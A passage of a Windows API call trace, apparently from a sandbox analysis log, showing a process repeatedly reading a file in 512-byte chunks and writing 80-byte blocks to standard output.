GetFileType (hFile=0x50) returned 0x1 [0177.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.945] GetFileType (hFile=0x50) returned 0x1 [0177.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.945] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.945] GetFileType (hFile=0x50) returned 0x1 [0177.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.945] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.945] GetFileType (hFile=0x50) returned 0x1 [0177.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.945] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.945] GetFileType (hFile=0x50) returned 0x1 [0177.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.945] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.945] GetFileType (hFile=0x50) returned 0x1 [0177.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.945] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 
[0177.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.946] GetFileType (hFile=0x50) returned 0x1 [0177.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.946] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.946] GetFileType (hFile=0x50) returned 0x1 [0177.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.946] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.946] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.946] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.946] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.946] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.946] GetFileType (hFile=0x50) returned 0x1 [0177.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.946] GetFileType (hFile=0x50) returned 0x1 [0177.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.946] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.946] GetFileType (hFile=0x50) returned 0x1 [0177.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.946] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.946] GetFileType (hFile=0x50) returned 0x1 [0177.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.946] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.946] GetFileType (hFile=0x50) returned 0x1 [0177.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.946] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.946] GetFileType (hFile=0x50) returned 0x1 [0177.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.946] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.947] GetFileType (hFile=0x50) returned 0x1 [0177.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.947] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.947] GetFileType (hFile=0x50) returned 0x1 [0177.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.947] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.947] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.947] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.947] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.947] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.947] GetFileType (hFile=0x50) returned 0x1 [0177.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.947] GetFileType (hFile=0x50) returned 0x1 [0177.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.947] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.947] GetFileType (hFile=0x50) returned 0x1 [0177.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.947] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.947] GetFileType (hFile=0x50) returned 0x1 [0177.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.947] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.947] GetFileType 
(hFile=0x50) returned 0x1 [0177.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.947] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.947] GetFileType (hFile=0x50) returned 0x1 [0177.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.947] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.947] GetFileType (hFile=0x50) returned 0x1 [0177.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.948] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.948] GetFileType (hFile=0x50) returned 0x1 [0177.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.948] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.948] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.948] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.948] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.948] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.948] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0177.948] GetFileType (hFile=0x50) returned 0x1 [0177.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.948] GetFileType (hFile=0x50) returned 0x1 [0177.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.948] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.948] GetFileType (hFile=0x50) returned 0x1 [0177.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.948] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.948] GetFileType (hFile=0x50) returned 0x1 [0177.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.948] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.948] GetFileType (hFile=0x50) returned 0x1 [0177.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.948] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.948] GetFileType (hFile=0x50) returned 0x1 [0177.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.948] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, 
lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.948] GetFileType (hFile=0x50) returned 0x1 [0177.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.949] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.949] GetFileType (hFile=0x50) returned 0x1 [0177.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.949] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.949] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.949] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.949] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.949] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.949] GetFileType (hFile=0x50) returned 0x1 [0177.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.949] GetFileType (hFile=0x50) returned 0x1 [0177.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.949] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.949] GetFileType (hFile=0x50) returned 0x1 [0177.949] _get_osfhandle (_FileHandle=1) returned 0x50 
[0177.949] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.949] GetFileType (hFile=0x50) returned 0x1 [0177.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.949] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.949] GetFileType (hFile=0x50) returned 0x1 [0177.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.949] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.949] GetFileType (hFile=0x50) returned 0x1 [0177.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.950] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.950] GetFileType (hFile=0x50) returned 0x1 [0177.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.950] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.950] GetFileType (hFile=0x50) returned 0x1 [0177.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.950] WriteFile (in: hFile=0x50, 
lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.950] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.950] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.950] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.950] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.950] GetFileType (hFile=0x50) returned 0x1 [0177.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.950] GetFileType (hFile=0x50) returned 0x1 [0177.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.950] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.950] GetFileType (hFile=0x50) returned 0x1 [0177.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.950] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.950] GetFileType (hFile=0x50) returned 0x1 [0177.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.950] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.950] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0177.950] GetFileType (hFile=0x50) returned 0x1 [0177.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.950] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.950] GetFileType (hFile=0x50) returned 0x1 [0177.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.951] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.951] GetFileType (hFile=0x50) returned 0x1 [0177.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.951] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.951] GetFileType (hFile=0x50) returned 0x1 [0177.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.951] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.951] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.951] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.951] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.951] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, 
lpOverlapped=0x0) returned 1 [0177.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.951] GetFileType (hFile=0x50) returned 0x1 [0177.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.951] GetFileType (hFile=0x50) returned 0x1 [0177.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.951] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.951] GetFileType (hFile=0x50) returned 0x1 [0177.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.951] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.951] GetFileType (hFile=0x50) returned 0x1 [0177.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.951] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.951] GetFileType (hFile=0x50) returned 0x1 [0177.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.951] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.951] GetFileType (hFile=0x50) returned 0x1 [0177.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.951] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 
| out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.952] GetFileType (hFile=0x50) returned 0x1 [0177.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.952] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.952] GetFileType (hFile=0x50) returned 0x1 [0177.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.952] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.952] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.952] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.952] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.952] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.952] GetFileType (hFile=0x50) returned 0x1 [0177.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.952] GetFileType (hFile=0x50) returned 0x1 [0177.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.952] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.952] GetFileType (hFile=0x50) returned 0x1 [0177.952] _get_osfhandle 
